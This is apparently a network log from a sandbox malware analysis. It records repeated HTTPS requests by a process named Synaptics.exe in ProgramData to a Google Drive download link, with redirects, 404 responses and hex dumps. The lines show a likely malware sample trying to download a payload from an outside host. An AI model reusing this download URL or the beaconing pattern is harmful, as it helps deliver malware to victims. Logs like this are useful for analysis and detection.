                                                                                                                                      Cookie: NID=520=ZX-DgLx8DKxqDSlyJFwMa40N-uOHIM4QJVTA_CoSWoPbU-m3uXi8BgemBWWBptEBpCCT7Rgt7WkVLTuyzu5xzaI92UcZ3ld7qutOfbNbCY3XbsR2udSNwxhnxf5MnRl8K4aUcSMKwK1fp9TXjgLnLD_puVz1kdUtxl9BQgyVE9NwVV9H-M0ZuQ8-
                                                                                                                                      2024-12-30 10:23:08 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC7rjjA8IbwYU2n2lgHjwstck9YCiEedBvToUDa3C3XjDvhH8Pq7ujbkFvaUhAX_GDBz3nZREfk
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:07 GMT
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-SSobHbL1VTkE-3_IYqw00A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:08 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                      2024-12-30 10:23:08 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 64 47 6b 64 6e 57 51 32 38 5a 30 39 68 68 72 4f 6e 2d 6c 73 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="cdGkdnWQ28Z09hhrOn-lsg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                      2024-12-30 10:23:08 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      9192.168.2.549722142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:07 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-12-30 10:23:07 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:07 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-e6ATtPYALh-K5QZcqYzU3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      10192.168.2.549726142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:08 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      11192.168.2.549727142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:08 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      12192.168.2.549728142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:08 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      13192.168.2.549729142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:08 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      14192.168.2.549736142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:09 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-12-30 10:23:09 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:09 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-S-recOWhpQgC1cSYgut8kw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      15192.168.2.549737142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:09 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-12-30 10:23:09 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:09 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-2YbhVRLu_GYVnXFzjK-oMw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      16192.168.2.549741142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:10 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:10 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC6ze6xarUd4btSy2zfLfp15Ul1QlsGTBHIsq3LmUT5KSpde0L-8Rxo5Ta95nEIHw_4k
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:10 GMT
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-qvdofiLoKEMrJQAFS2NbaQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:10 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                      2024-12-30 10:23:10 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 77 5f 41 67 5f 69 54 4d 48 66 56 76 7a 6f 74 64 50 30 7a 54 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="Zw_Ag_iTMHfVvzotdP0zTQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                      2024-12-30 10:23:10 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      17192.168.2.549742142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:10 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-12-30 10:23:10 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:10 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-WHSPaaDdq10igbPmK3qaDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      18192.168.2.549743142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:10 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:10 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC6rSqy7xzHkTkjdn5P-MkO5yymamI38df59wzjAIo_3P1gaXqwAKwwjg1oOr9IXIboz
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:10 GMT
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-PYjB6A3Yo_M-aFospdP96w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:10 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                      2024-12-30 10:23:10 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 50 4e 7a 66 6b 58 77 64 4e 38 68 35 57 56 6b 74 74 64 39 62 69 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="PNzfkXwdN8h5WVkttd9big">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                      2024-12-30 10:23:10 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
